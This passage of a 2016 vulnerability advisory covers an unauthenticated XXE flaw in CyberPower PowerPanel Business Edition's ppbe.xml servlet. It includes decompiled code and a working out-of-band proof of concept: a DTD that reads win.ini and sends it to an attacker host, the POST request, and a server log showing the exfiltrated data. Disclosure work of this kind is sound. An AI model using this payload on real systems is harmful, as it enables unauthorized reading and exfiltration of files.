event logging, hibernation mode, internal reports and analysis,
remote management, and more.
Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability using the DTD parameter entities
technique resulting in disclosure and retrieval of arbitrary
data on the affected node via out-of-band (OOB) attack. The
vulnerability is triggered when input passed to the xmlservice
servlet using the ppbe.xml script is not sanitized while parsing the
xml inquiry payload returned by the JAXB element translation.
================================================================
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------
94: private InquirePayload splitInquirePayload(InputStream paramInputStream)
95: throws RequestException
96: {
97: try
98: {
99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102: return (InquirePayload)localJAXBElement.getValue();
103: }
104: catch (JAXBException localJAXBException)
105: {
106: localJAXBException.printStackTrace();
107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108: }
109: }
---
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------
28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>
================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 EN
Microsoft Windows 8
Microsoft Windows Server 2012
Linux (64bit)
MacOS X 10.6
Jetty(7.5.0.v20110901)
Java/1.8.0_91-b14
SimpleHTTP/0.6 Python/2.7.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php
22.06.2016
--
C:\data\xxe.xml:
----------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">
Request:
--------
POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>
Response:
---------
C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -